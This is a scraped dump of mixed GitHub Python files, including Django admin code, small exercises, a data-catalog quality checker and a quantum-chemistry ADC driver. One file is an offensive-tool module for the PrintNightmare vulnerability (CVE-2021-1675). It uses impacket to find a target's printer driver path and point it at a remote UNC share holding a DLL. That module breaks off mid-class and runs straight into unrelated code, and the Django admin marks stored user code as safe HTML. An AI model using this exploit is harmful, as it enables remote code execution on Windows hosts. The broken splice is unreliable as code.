}","repo_name":"naufalmahing/todo-app","sub_path":"todo_site/todo/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19452232240","text":"from django.contrib import admin\nfrom django.utils.html import mark_safe, format_html\nfrom projects.models import Project, ProjectFiles, ProjectUser, PythonTrain\n\n\nclass ProjectFilesInline(admin.TabularInline):\n model = ProjectFiles\n extra = 1\n exclude = ('is_deleted',)\n\n\nclass ProjectAdmin(admin.ModelAdmin):\n list_display = ('name', 'start_date', 'end_date', 'stuff_list')\n sortable_by = ()\n exclude = ('is_deleted',)\n show_full_result_count = False\n\n def stuff_list(self, obj):\n pusers = ProjectUser.objects.filter(project_id=obj.id, is_deleted=0)\n users = [i.user.name for i in pusers if i.user.name]\n datas = \"
\".join(users)\n return format_html(datas)\n\n stuff_list.short_description = \"成员\"\n\n def get_queryset(self, request):\n qs = super(ProjectAdmin, self).get_queryset(request)\n qs = qs.filter(is_deleted=0)\n # if not request.user.is_superuser:\n # qs = qs.filter(projectuser__user_id=request.user.id)\n return qs\n\n def has_delete_permission(self, request, obj=None):\n if request.user.is_superuser:\n return True\n return False\n\n def has_add_permission(self, request):\n if request.user.is_superuser:\n return True\n return False\n\n def has_change_permission(self, request, obj=None):\n if request.user.is_superuser:\n return True\n return False\n\n\nclass ProjectFilesAdmin(admin.ModelAdmin):\n list_display = ('project', 'file_url', 'sort', 'created')\n exclude = ('is_deleted',)\n show_full_result_count = False\n sortable_by = ()\n\n def file_url(self, obj):\n if not obj.file:\n return ''\n return format_html(obj.file.url)\n\n def has_module_permission(self, request):\n if request.user.is_superuser:\n return True\n return False\n\n\nclass PythonTrainAdmin(admin.ModelAdmin):\n list_display = ('id', 'user_name', 'code_txt', 'created')\n list_display_links = ('code_txt',)\n list_filter = ('user',)\n exclude = ('is_deleted',)\n show_full_result_count = False\n # actions_selection_counter = False\n sortable_by = ()\n\n def code_txt(self, obj):\n return mark_safe(obj.code[:20])\n\n code_txt.short_description = \"代码\"\n\n def user_name(self, obj):\n return format_html(obj.user.name)\n\n user_name.short_description = \"学生\"\n\n def get_queryset(self, request):\n qs = super(PythonTrainAdmin, self).get_queryset(request)\n qs = qs.filter(is_deleted=0)\n if not request.user.is_superuser:\n qs = qs.filter(user_id=request.user.id)\n return qs\n\n def changelist_view(self, request, extra_context=None):\n if not request.user.is_superuser:\n self.list_display = ('id', 'code_txt', 'created')\n self.list_filter = ()\n return super(PythonTrainAdmin, self).changelist_view(request, extra_context=extra_context)\n\n def change_view(self, request, object_id, form_url=\"\", extra_context=None):\n user = request.user\n # self.change_form_template = \"python_train/change_form.html\"\n self.change_form_template = \"python_train/index.html\"\n extra_context = extra_context or {}\n train = PythonTrain.objects.filter(id=object_id).first()\n extra_context['user'] = user\n extra_context['sid'] = object_id\n extra_context['code'] = train.code or \"\"\n\n extra_context['show_save_and_continue'] = False\n extra_context['show_save'] = False\n extra_context['show_save_and_add_another'] = False\n return super(PythonTrainAdmin, self).change_view(request, object_id, form_url=form_url,\n extra_context=extra_context)\n\n def add_view(self, request, form_url=\"\", extra_context=None):\n user = request.user\n # self.change_form_template = \"python_train/change_form.html\"\n self.change_form_template = \"python_train/index.html\"\n extra_context = extra_context or {}\n extra_context['user'] = user\n extra_context['sid'] = \"\"\n extra_context['code'] = \"\"\n\n extra_context['show_save_and_continue'] = False\n extra_context['show_save'] = False\n extra_context['show_save_and_add_another'] = False\n return super(PythonTrainAdmin, self).add_view(request, form_url=form_url,\n extra_context=extra_context)\n\n\nadmin.site.register(Project, ProjectAdmin)\nadmin.site.register(ProjectFiles, ProjectFilesAdmin)\nadmin.site.register(PythonTrain, 
PythonTrainAdmin)\n","repo_name":"U-Recommend/lesson_sys","sub_path":"projects/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14757173571","text":"import random\n\n\ndef throws(stick, throw):\n sticks_list = ['I' for _ in range(stick)]\n for i in range(1, throw + 1):\n left_i = random.randint(1, stick)\n right_i = random.randint(left_i, stick)\n print(f'Бросок {i}. Сбиты палки с номера {left_i} по номер {right_i}')\n sticks_list = [sticks_list[i_index] if left_i - 1 > i_index or i_index > right_i - 1\n else '.' for i_index in range(stick)]\n return sticks_list\n\n\nsticks_total = int(input('Количество палок: '))\nthrows_total = int(input('Количество бросков: '))\n\nsticks = throws(sticks_total, throws_total)\n\nprint('Результат:', sticks)\n","repo_name":"Elfateru/python_basic","sub_path":"Module17/08_entertainment/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33478016060","text":"# Given a linked list, remove the nth node from the end of list and return its head.\n\n# For example,\n# Given linked list: 1->2->3->4->5, and n = 2.\n# After removing the second node from the end, the linked list becomes 1->2->3->5.\n\n# Note:\n# If n is greater than the size of the list, remove the first node of the list.\n# Try doing it using constant additional space.\ndef removeNthFromEnd(A,B):\n #Calculating length\n temp = A\n lenA = 0\n while temp:\n lenA+=1\n temp = temp.next\n if lenA==0:\n return A\n if B==0:\n diff = lenA-1\n temp = A\n while diff>0:\n temp = temp.next\n diff-=1\n temp.next = None\n return A\n if B>=lenA:\n A = A.next\n return A\n else:\n diff = lenA-B-1\n temp=A\n while diff>0:\n temp = temp.next\n diff-=1\n to_delete = temp.next\n temp.next = to_delete.next\n return A\n","repo_name":"Divine11/InterviewBit","sub_path":"Linked List/Remove_nth_node_from_list_end.py","file_name":"Remove_nth_node_from_list_end.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23014911362","text":"# -*- coding: utf-8 -*-\n\"\"\"\n[Martinez-Gil2023d] Framework to Automatically Determine the Quality of Open Data Catalogs, arXiv preprint arXiv:2307.15464, 2023\n\n@author: Jorge Martinez-Gil\n\"\"\"\nimport sys\nfrom collections import defaultdict\nfrom rdflib import Graph, RDF, Namespace, URIRef\nimport requests\n\n# Define some RDF prefixes\ndcat = Namespace(\"http://www.w3.org/ns/dcat#\")\ndct = Namespace(\"http://purl.org/dc/terms/\")\nrdf = Namespace(\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\")\n\n# Example DCT properties (you can adjust as needed)\ndct_properties = [\n dct.title,\n dct.identifier,\n dct.description\n]\n\ndef check_links(rdf_data):\n \"\"\"\n Checks the links in an RDF graph to see if they are broken.\n\n Args:\n rdf_data (str): The RDF data to check for broken links.\n\n Returns:\n float: The percentage of broken links in the RDF data.\n \"\"\"\n graph = Graph()\n graph.parse(data=rdf_data, format=\"turtle\")\n total_links = 0\n broken_links = 0\n for s, p, o in graph:\n if isinstance(o, URIRef):\n total_links += 1\n try:\n response = requests.get(o)\n if response.status_code != 200:\n broken_links += 1\n except:\n broken_links += 1\n if total_links == 0:\n print(\"No links found in the RDF data.\")\n return 
0\n else:\n percentage_broken = (broken_links / total_links) * 100\n print(f\"{percentage_broken}% of links are broken.\")\n return percentage_broken\n\n\ndef calculate_duplicates(rdf_data):\n \"\"\"\n Calculates the percentage of duplicated datasets or distributions in a Data Catalog.\n\n Args:\n rdf_data (str): The RDF data to check for duplicates.\n\n Returns:\n float: The percentage of duplicated datasets or distributions in the RDF data.\n \"\"\"\n graph = Graph()\n graph.parse(data=rdf_data, format=\"turtle\")\n\n duplicates = defaultdict(int)\n for s, p, o in graph.triples((None, None, None)):\n if p == dcat.title or p == dcat.downloadURL:\n duplicates[o] += 1\n total_items = len(duplicates)\n duplicates_count = sum(1 for count in duplicates.values() if count > 1)\n if total_items == 0:\n print(\"No datasets or distributions found in the RDF data.\")\n return 0\n else:\n percentage_duplicates = (duplicates_count / total_items) * 100\n print(f\"{percentage_duplicates}% of datasets or distributions are duplicated.\")\n return percentage_duplicates\n\n\ndef core_links(rdf_data, property_set):\n \"\"\"\n Calculates the percentage of missing core properties in a Data Catalog.\n\n Args:\n rdf_data (str): The RDF data to check for missing core properties.\n property_set (str): The property set to use ('dcat' or 'dct').\n\n Returns:\n float: The percentage of missing core properties in the RDF data.\n \"\"\"\n required_properties = dct_properties if property_set == 'dct' else [\n dcat.title,\n rdf.type\n ]\n graph = Graph()\n graph.parse(data=rdf_data, format=\"turtle\")\n completeness_scores = []\n for subject_type in [dcat.Catalog, dcat.Dataset, dcat.Distribution]:\n for subject in graph.subjects(RDF.type, subject_type):\n completeness_score = calculate_completeness(graph, subject, required_properties)\n completeness_scores.append(completeness_score)\n result = sum(completeness_scores) / len(completeness_scores)\n print(f\"{result}% of core properties are not present using {property_set.upper()} properties.\")\n return result\n\n\ndef check_accuracy(rdf_data, property_set):\n \"\"\"\n Calculates the accuracy of a Data Catalog file by averaging the percentages of broken links, duplicated datasets or distributions, and missing core properties.\n\n Args:\n rdf_data (str): The RDF data to check for accuracy.\n property_set (str): The property set to use ('dcat' or 'dct').\n\n Returns:\n float: The accuracy of the RDF data file.\n \"\"\"\n core_result = core_links(rdf_data, property_set)\n duplicates_result = calculate_duplicates(rdf_data)\n check_links_result = check_links(rdf_data)\n mean = (core_result + duplicates_result + check_links_result) / 3\n return mean\n \n \ndef calculate_completeness(graph, subject, required_properties):\n \"\"\"\n Calculates the completeness of a subject in an RDF graph by checking if it has all the required properties.\n\n Args:\n graph (rdflib.Graph): The RDF graph to check for completeness.\n subject (rdflib.term.URIRef): The subject to check for completeness.\n required_properties (list): The list of required properties.\n\n Returns:\n float: The completeness percentage.\n \"\"\"\n present_properties = set()\n for predicate, obj in graph.predicate_objects(subject):\n if predicate in required_properties:\n present_properties.add(predicate)\n return len(present_properties) / len(required_properties) * 100\n \n\"\"\"\nThis program checks the accuracy of a Data Catalog by calculating the percentage of broken links, duplicated datasets or distributions, and 
missing core properties.\n\nUsage: python check_accuracy.py filepath [dcat|dct]\n\"\"\"\ndef main():\n try:\n if len(sys.argv) < 3:\n print(\"Usage: python check_accuracy.py filepath [dcat|dct]\")\n sys.exit(1)\n\n rdf_data_path = sys.argv[1]\n property_set = sys.argv[2]\n\n if property_set not in ['dcat', 'dct']:\n print(\"Invalid property set. Choose 'dcat' or 'dct'.\")\n sys.exit(1)\n\n with open(rdf_data_path, \"r\", encoding=\"utf-8\") as f:\n rdf_data = f.read()\n\n result = check_accuracy(rdf_data, property_set)\n print(f\"The accuracy of {rdf_data_path} using {property_set.upper()} properties is {result}%.\")\n\n except FileNotFoundError:\n print(f\"File not found: {rdf_data_path}\")\n sys.exit(1)\n except UnicodeDecodeError as e:\n print(f\"Unicode decode error: {e}\")\n sys.exit(1)\n except Exception as e:\n print(f\"Error: {e}\")\n sys.exit(1)\n\nif __name__ == \"__main__\":\n main()","repo_name":"jorge-martinez-gil/dataq","sub_path":"check_accuracy.py","file_name":"check_accuracy.py","file_ext":"py","file_size_in_byte":6142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38015427281","text":"\r\nstring1 = input(\"a : \")\r\n\r\nstring2 = input(\"b : \")\r\n#-----------------------------------------------------------------------------------------\r\ns1 = list(string1)\r\ns2 = list(string2) \r\n\r\ns1 = sorted(s1)\r\ns2 = sorted(s2)\r\n\r\n# print(s1)\r\n# print(s2)\r\n\r\ndlist = list()\r\ndlist2 = list()\r\nsayac=0\r\nsayac1=0\r\nsayac2=0\r\nsayac3=0\r\n\r\nif len(s1) == len(s2):\r\n for i in s1:\r\n if i in s2:\r\n sayac=sayac+1\r\n else:\r\n dlist.append(i)\r\n sayac=sayac+1\r\n print(\"Please remove from '\"+string1+\"' >> \"+str(dlist))\r\n for j in s2:\r\n if j in s1:\r\n sayac1=sayac1+1\r\n else:\r\n dlist2.append(j)\r\n sayac1=sayac1+1\r\n print(\"Please remove from '\"+string2+\"' >> \"+str(dlist2))\r\n#-------------------------------------------------------------------------\r\nif len(s1) > len(s2):\r\n for i in s1:\r\n if i in s2:\r\n sayac=sayac+1\r\n else:\r\n dlist.append(i)\r\n sayac=sayac+1\r\n print(\"Please remove from '\"+string1+\"' >> \"+str(dlist))\r\n#-------------------------------------------------------------------------\r\nif len(s2) > len(s1):\r\n for i in s2:\r\n if i in s1:\r\n sayac=sayac+1\r\n else:\r\n dlist.append(i)\r\n sayac=sayac+1\r\n print(\"Please remove from '\"+string2+\"' >> \"+str(dlist))\r\n#-------------------------------------------------------------------------\r\nstr1 = str(string1)\r\n\r\nstr2 = str(string2)\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef anagram_mi(str1, str2):\r\n\r\n n1 = len(str1)\r\n\r\n n2 = len(str2)\r\n\r\n if n1 != n2:\r\n\r\n return 0\r\n\r\n str1 = sorted(str1)\r\n\r\n str2 = sorted(str2)\r\n\r\n for i in range(0, n1):\r\n\r\n if str1[i] != str2[i]:\r\n\r\n return 0\r\n\r\n return 1\r\n\r\n\r\nif anagram_mi(str1, str2):\r\n\r\n print(\"Yes it is an Anagram.\")\r\n\r\nelse:\r\n print(\"No, it is not an Anagram\")\r\n ","repo_name":"emrbli/anagram-parser","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"28431812698","text":"import sys\nfrom ctypes import *\nimport socket\nimport struct\nimport logging\n\nfrom utils.output import Output\nfrom utils.db import DB\nfrom utils.utils import gen_random_string, gen_bruteforce_creds\nfrom server.vulnerability_callback import VulnCallback\n\nimport impacket\nimport pathlib\nfrom 
impacket.dcerpc.v5 import rprn\nfrom impacket.dcerpc.v5 import transport\nfrom impacket.dcerpc.v5.dtypes import NULL\nfrom impacket.structure import Structure\n\n# source: https://github.com/cube0x0/CVE-2021-1675\n\nclass Module:\n name = 'PrintNightmare'\n description = 'Check PrintNightmare vulnerability (CVE-2021-1675) [authenticated] (argument: IP for check or \\'\\\\\\\\IP\\\\SHARE\\\\path\\\\to\\\\dll.dll\\' for exploit)'\n\n def run(self, target, args, creds, timeout):\n if len(args) != 1:\n Output.error({'target': 'smb://%s:%d' % (target['hostname'], target['port']), 'message': '[%s] PrintNightmare module requires 1 arg: -m printnightmare ' % self.name})\n return\n else:\n listener_ip = args[0]\n\n domain = creds['domain'] if 'domain' in creds else None\n user = creds['username'] if 'username' in creds else None\n password = creds['password'] if 'password' in creds else None\n ntlm_hash = creds['hash'] if 'hash' in creds else ''\n do_kerberos = creds['kerberos'] if 'kerberos' in creds else False\n dc_ip = creds['dc_ip'] if 'dc_ip' in creds else None\n\n if user == None:\n Output.highlight({'target': 'smb://%s:%d' % (target['hostname'], target['port']), 'message': '[%s] Printnightmare module works best with an account !' % self.name})\n\n Output.minor({'target': 'smb://%s:%d' % (target['hostname'], 445), 'message': '[%s] Running module...' % self.name})\n\n check(target['hostname'], target['port'], listener_ip, domain, user, password, ntlm_hash, do_kerberos, dc_ip, timeout)\n\ndef check(ip, port, listener_ip, domain, username, password, ntlm_hash, do_kerberos, dc_ip, timeout):\n\n do_kerberos = False\n pipe = 'lsarpc'\n if len(ntlm_hash) != 0:\n if not ':' in ntlm_hash:\n lmhash = 'aad3b435b51404eeaad3b435b51404ee'\n nthash = ntlm_hash.lower()\n else:\n lmhash, nthash = ntlm_hash.split(':')\n else:\n lmhash = ''\n nthash = ''\n\n #connect\n dce = connect(username, password, domain, lmhash, nthash, do_kerberos, dc_ip, ip, port)\n #handle = \"\\\\\\\\{0}\\x00\".format(address)\n handle = NULL\n \n #find \"C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\ntprint.inf_amd64_83aa9aebf5dffc96\\\\Amd64\\\\UNIDRV.DLL\" path\n try:\n blob = getDriver(dce, handle)\n if blob == None:\n return\n\n pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\\\UNIDRV.DLL'\n if not \"FileRepository\" in pDriverPath:\n #print(\"[-] pDriverPath {0}, expected :\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\.....\".format(pDriverPath))\n #print(\"[-] Specify pDriverPath manually\")\n return\n except Exception as e:\n #print('[-] Failed to enumerate remote pDriverPath')\n #print(str(e))\n return\n\n vuln_info = {\n 'hostname': ip,\n 'port': port,\n 'service': 'smb',\n 'url': 'smb://%s:%d' % (ip, port),\n 'name': 'CVE-2021-1675 (PrintNightmare)',\n 'description': 'Server smb://%s:%d is vulnerable to CVE-2021-1675 (PrintNightmare)' % (ip, port),\n }\n\n if \"\\\\\\\\\" in listener_ip:\n listener_share = listener_ip\n else:\n # Don't do this if listener_ip = share\n vuln_id = VulnCallback.new_vulnerability_check(vuln_info)\n\n listener_share = \"\\\\\\\\%s\\\\vuln\\\\%s\" % (listener_ip, vuln_id)\n\n if \"\\\\\\\\\" in listener_share:\n listener_share = listener_share.replace(\"\\\\\\\\\",\"\\\\??\\\\UNC\\\\\")\n\n #print(\"[+] pDriverPath Found {0}\".format(pDriverPath))\n #print(\"[*] Executing {0}\".format(options.share))\n\n #re-run if stage0/stageX fails\n for i in range(3):\n #print(\"[*] Try 1...\")\n completed = exploit(ip, dce, pDriverPath, 
listener_share)\n if completed:\n break\n\n#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030\nclass DRIVER_INFO_2_BLOB(Structure):\n structure = (\n ('cVersion',' self.adc_tol:\n error_text = os.linesep + os.linesep\n error_text += '*** SCF convergence threshold '\n error_text += '({:.1e}) '.format(scf_drv.conv_thresh)\n error_text += 'needs to be lower than ADC convergence '\n error_text += 'tolerance ({:.1e})'.format(self.adc_tol)\n error_text += os.linesep\n raise ValueError(error_text)\n\n if 'states' in adc_dict:\n self.adc_states = int(adc_dict['states'])\n\n if 'singlets' in adc_dict:\n self.adc_singlets = int(adc_dict['singlets'])\n self.adc_states = None\n\n if 'triplets' in adc_dict:\n self.adc_triplets = int(adc_dict['triplets'])\n self.adc_states = None\n self.adc_singlets = None\n\n if 'spin_flip' in adc_dict:\n self.adc_spin_flip = int(adc_dict['spin_flip'])\n self.adc_states = None\n self.adc_singlets = None\n self.adc_triplets = None\n\n if 'method' in adc_dict:\n if 'cpp' in adc_dict['method']:\n self.cpp = True\n self.adc_method = adc_dict['method'].split()[0]\n else:\n self.adc_method = adc_dict['method']\n\n if 'frequencies' in adc_dict:\n self.frequencies = adc_dict['frequencies']\n self.adc_triplets = None\n self.adc_states = None\n self.adc_singlets = None\n self.adc_spin_flip = None\n\n if 'damping' in adc_dict:\n self.damping = float(adc_dict['damping'])\n\n if 'core_orbitals' in adc_dict:\n self.adc_core_orbitals = self.parse_orbital_input(\n adc_dict['core_orbitals'])\n\n if 'frozen_core' in adc_dict:\n self.adc_frozen_core = self.parse_orbital_input(\n adc_dict['frozen_core'])\n\n if 'frozen_virtual' in adc_dict:\n self.adc_frozen_virtual = self.parse_orbital_input(\n adc_dict['frozen_virtual'])\n\n if 'print_states' in adc_dict:\n key = adc_dict['print_states'].lower()\n self.print_states = True if key in ['yes', 'y'] else False\n\n if 'ecd' in adc_dict:\n key = adc_dict['ecd'].lower()\n self.adc_ecd = False if key in ['no', 'n'] else True\n\n @staticmethod\n def parse_orbital_input(orbs):\n \"\"\"\n Parses input orbital indices (1-based) and returns a list of orbital\n indices (0-based).\n\n Examples (input -> output):\n 1 -> [0]\n (1, 3) -> [0, 2]\n '1 - 5' -> [0, 1, 2, 3, 4]\n [1, 2, 3, 4] -> [0, 1, 2, 3]\n '1-3, 4, 5-7' -> [0, 1, 2, 3, 4, 5, 6]\n\n :param orbs:\n The input orbital indices (can be integer, list, tuple, or string).\n :return:\n A list of orbital indices.\n \"\"\"\n\n if isinstance(orbs, int):\n return [orbs - 1]\n elif isinstance(orbs, (list, tuple)):\n return [x - 1 for x in orbs]\n elif isinstance(orbs, str):\n output = []\n for x in orbs.replace(',', ' ').split():\n if '-' in x:\n z = [int(y) for y in x.split('-')]\n output += list(range(z[0] - 1, z[-1], 1))\n else:\n output.append(int(x) - 1)\n return output\n\n @staticmethod\n def parse_frequencies(input_frequencies):\n \"\"\"\n Parses input frequencies for the respondo response library.\n\n Input example: \"0.4-0.5 (0.002), 0.7-0.9 (0.001)\"\n\n :param input_frequencies:\n The string of input frequencies.\n :return:\n an ndarray of frequencies required by respondo\n \"\"\"\n if isinstance(input_frequencies, np.ndarray):\n return input_frequencies\n\n frequencies = []\n for w in input_frequencies.split(','):\n if '-' in w:\n m = re.search(r'^(.*)-(.*)\\((.*)\\)$', w)\n if m is None:\n m = re.search(r'^(.*)-(.*)-(.*)$', w)\n\n frequencies += list(\n np.arange(\n float(m.group(1)),\n float(m.group(2)),\n float(m.group(3)),\n ))\n 
elif w:\n frequencies.append(float(w))\n return np.array(frequencies)\n\n def compute(self, task, scf_drv, verbose=True):\n \"\"\"\n Performs ADC calculation.\n\n :param task:\n The gator task.\n :param scf_drv:\n The converged SCF driver.\n \"\"\"\n\n scf_drv.task = task\n\n if self.rank == mpi_master():\n if verbose:\n self.print_header()\n\n try:\n import adcc\n except ImportError:\n error_text = os.linesep + os.linesep\n error_text += '*** Unable to import adcc. ' + os.linesep\n error_text += '*** Please download and install '\n error_text += 'from https://github.com/adc-connect/adcc'\n error_text += os.linesep\n raise ImportError(error_text)\n\n if self.cpp:\n if self.frequencies is None:\n error_text = os.linesep + os.linesep\n error_text += '*** Please define a frequency range (a.u.)'\n error_text += ' for the cpp solver.'\n error_text += os.linesep + '*** Example:' + os.linesep\n error_text += 'frequencies: 0.40-0.60 (0.05)'\n error_text += os.linesep\n raise ValueError(error_text)\n if self.damping is None:\n error_text = os.linesep + os.linesep\n error_text += '*** Please define a damping parameter '\n error_text += '(a.u.) for the cpp solver.'\n error_text += os.linesep + 'Example:' + os.linesep\n error_text += 'damping: 0.001'\n error_text += os.linesep\n raise ValueError(error_text)\n try:\n import respondo\n except ImportError:\n error_text = os.linesep + os.linesep\n error_text += '*** Unable to import respondo. ' + os.linesep\n error_text += '*** Please install from conda or '\n error_text += 'https://github.com/gator-program/respondo'\n error_text += os.linesep\n raise ImportError(error_text)\n\n adc_drv = adcc.ReferenceState(\n scf_drv,\n core_orbitals=self.adc_core_orbitals,\n frozen_core=self.adc_frozen_core,\n frozen_virtual=self.adc_frozen_virtual)\n\n frequencies = self.parse_frequencies(self.frequencies)\n all_pol = [\n respondo.complex_polarizability(adc_drv,\n method=self.adc_method,\n omega=w,\n gamma=self.damping,\n conv_tol=self.adc_tol)\n for w in frequencies\n ]\n cross_sections = (\n respondo.polarizability.one_photon_absorption_cross_section(\n np.array(all_pol), frequencies))\n\n if verbose:\n self.print_cpp_results(frequencies, cross_sections)\n\n return frequencies, cross_sections\n\n else:\n\n # set number of threads in adcc\n adcc.set_n_threads(int(os.environ['OMP_NUM_THREADS']))\n\n adc_drv = adcc.run_adc(scf_drv,\n method=self.adc_method,\n core_orbitals=self.adc_core_orbitals,\n n_states=self.adc_states,\n n_singlets=self.adc_singlets,\n n_triplets=self.adc_triplets,\n n_spin_flip=self.adc_spin_flip,\n frozen_core=self.adc_frozen_core,\n frozen_virtual=self.adc_frozen_virtual,\n conv_tol=self.adc_tol)\n\n if verbose:\n self.print_excited_states(adc_drv)\n\n if self.print_states:\n self.print_detailed_states(adc_drv)\n\n if verbose:\n self.print_convergence(adc_drv)\n\n return adc_drv\n\n def print_header(self):\n \"\"\"\n Prints header for the ADC driver.\n \"\"\"\n\n self.ostream.print_blank()\n text = 'Algebraic Diagrammatic Construction (ADC)'\n self.ostream.print_header(text)\n self.ostream.print_header('=' * (len(text) + 2))\n self.ostream.print_blank()\n\n str_width = 60\n cur_str = 'ADC method : {:s}'.format(self.adc_method)\n if self.cpp:\n cur_str += ' (cpp)'\n self.ostream.print_header(cur_str.ljust(str_width))\n if self.adc_states is not None:\n cur_str = 'Number of States : {:d}'.format(\n self.adc_states)\n self.ostream.print_header(cur_str.ljust(str_width))\n elif self.adc_singlets is not None:\n cur_str = 'Number of Singlet States : 
{:d}'.format(\n self.adc_singlets)\n self.ostream.print_header(cur_str.ljust(str_width))\n elif self.adc_triplets is not None:\n cur_str = 'Number of Triplet States : {:d}'.format(\n self.adc_triplets)\n self.ostream.print_header(cur_str.ljust(str_width))\n elif self.adc_spin_flip is not None:\n cur_str = 'Number of States, Spin-Flip : {:d}'.format(\n self.adc_spin_flip)\n self.ostream.print_header(cur_str.ljust(str_width))\n else:\n freqs = [f.strip() for f in self.frequencies.split(',')]\n cur_str = 'Frequencies (a.u.) : {:s}'.format(freqs[0])\n self.ostream.print_header(cur_str.ljust(str_width))\n for f in freqs[1:]:\n cur_str = ' {:s}'.format(f)\n self.ostream.print_header(cur_str.ljust(str_width))\n\n if self.damping is not None:\n cur_str = 'Damping : {:f} a.u.'.format(\n self.damping)\n self.ostream.print_header(cur_str.ljust(str_width))\n\n if self.adc_core_orbitals is not None:\n cur_str = 'CVS-ADC, Core Orbital Space :'\n for orb in self.adc_core_orbitals:\n cur_str += ' {:d}'.format(orb + 1)\n # '+1' converts from run_adc indexing (starts at 0) back to\n # input indexing (starts at 1)\n self.ostream.print_header(cur_str.ljust(str_width))\n\n if self.adc_frozen_core is not None:\n cur_str = 'Frozen Core Orbital Space :'\n for orb in self.adc_frozen_core:\n cur_str += ' {:d}'.format(orb + 1)\n # '+1' converts from run_adc indexing (starts at 0) back to\n # input indexing (starts at 1)\n self.ostream.print_header(cur_str.ljust(str_width))\n\n if self.adc_frozen_virtual is not None:\n cur_str = 'Frozen Virtual Orbital Space :'\n for orb in self.adc_frozen_virtual:\n cur_str += ' {:d}'.format(orb + 1)\n # '+1' converts from run_adc indexing (starts at 0) back to\n # input indexing (starts at 1)\n self.ostream.print_header(cur_str.ljust(str_width))\n\n cur_str = 'Convergence threshold : {:.1e}'.format(self.adc_tol)\n self.ostream.print_header(cur_str.ljust(str_width))\n\n self.ostream.print_blank()\n self.ostream.flush()\n\n def print_convergence(self, adc_drv):\n \"\"\"\n Prints finish header to output stream.\n \"\"\"\n\n end = ' All went well!'\n if not hasattr(adc_drv, 'converged'):\n self.ostream.print_header('NOT CONVERGED')\n end = ' Did NOT converge.'\n\n self.ostream.print_header('End of ADC calculation.' + end)\n self.ostream.print_blank()\n self.ostream.flush()\n\n def print_cpp_results(self, frequencies, cross_sections):\n from scipy import constants\n eV = constants.value(\"Hartree energy in eV\")\n\n text = 'ADC, Complex Polarization Propagator'\n self.ostream.print_blank()\n self.ostream.print_header(text)\n self.ostream.print_header('-' * (len(text) + 2))\n self.ostream.print_blank()\n valstr = '{} | {} | {} '.format(' Frequency (a.u) ',\n ' Frequency (eV)',\n ' Cross Section (a.u.) 
')\n self.ostream.print_header(valstr)\n self.ostream.print_header('-' * (len(text) + 25))\n for i in range(len(frequencies)):\n valstr = ' {:10.7f} {:18.7f} {:18.7f} '.format(\n frequencies[i], eV * frequencies[i], cross_sections[i])\n self.ostream.print_header(valstr)\n\n self.ostream.print_blank()\n\n def print_excited_states(self, adc_drv):\n \"\"\"\n Prints excited state information to output stream.\n\n :param adc_drv:\n The ADC driver.\n \"\"\"\n\n eV = constants.value('Hartree energy in eV')\n\n self.ostream.print_blank()\n text = 'ADC Summary of Results'\n self.ostream.print_header(text)\n self.ostream.print_header('-' * (len(text) + 2))\n self.ostream.print_blank()\n try:\n self.ostream.print_block(\n adc_drv.describe(rotatory_strengths=self.adc_ecd))\n except TypeError:\n if self.adc_ecd is False:\n self.ostream.print_block(adc_drv.describe())\n else:\n error_text = os.linesep + os.linesep\n error_text += '*** Rotatory strengths not available.'\n error_text += os.linesep\n error_text += '*** Please update your adcc version. '\n error_text += 'See https://github.com/adc-connect/adcc. '\n error_text += os.linesep\n raise TypeError(error_text)\n\n if hasattr(adc_drv, 'pe_ptss_correction'):\n text = 'Polarizable Embedding Perturbative Corrections'\n self.ostream.print_blank()\n self.ostream.print_header(text)\n self.ostream.print_header('-' * (len(text) + 2))\n self.ostream.print_blank()\n valstr = '{} | {} | {} | {} | {}'.format('Index',\n 'Excitation Energy',\n 'Uncorrected Energy',\n 'ptSS Correction',\n 'ptLR Correction')\n self.ostream.print_header(valstr)\n valstr = ' {} {} {} {} {}'.format(' # ',\n ' (eV) ',\n ' (ev) ',\n ' (eV) ',\n ' (eV) ')\n self.ostream.print_header(valstr)\n self.ostream.print_header('-' * (len(text) + 32))\n for i in range(len(adc_drv.excitation_energy)):\n valstr = ' {:3d} {:18.7f} {:18.7f} {:18.7f} {:17.7f}'.format(\n i, eV * adc_drv.excitation_energy[i],\n eV * adc_drv.excitation_energy_uncorrected[i],\n eV * adc_drv.pe_ptss_correction[i],\n eV * adc_drv.pe_ptlr_correction[i])\n self.ostream.print_header(valstr)\n\n self.ostream.print_blank()\n\n def print_detailed_states(self, adc_drv):\n \"\"\"\n Prints excited state information to output stream.\n\n :param adc_drv:\n The ADC driver.\n \"\"\"\n\n self.ostream.print_blank()\n text = 'ADC Excited States'\n self.ostream.print_header(text)\n self.ostream.print_header('-' * (len(text) + 2))\n self.ostream.print_blank()\n self.ostream.print_block(\n adc_drv.describe_amplitudes(index_format=\"homolumo\"))\n self.ostream.print_blank()\n","repo_name":"gator-program/gator","sub_path":"src/adcdriver.py","file_name":"adcdriver.py","file_ext":"py","file_size_in_byte":19461,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"5743578155","text":"\"\"\"Tools for seven-segment display banks.\"\"\"\n\nfrom nmigen import *\nfrom nmigen.build import *\nfrom nmigen.hdl.rec import *\n\nfrom nmigen_nexys.core import pwm as pwm_module\nfrom nmigen_nexys.math 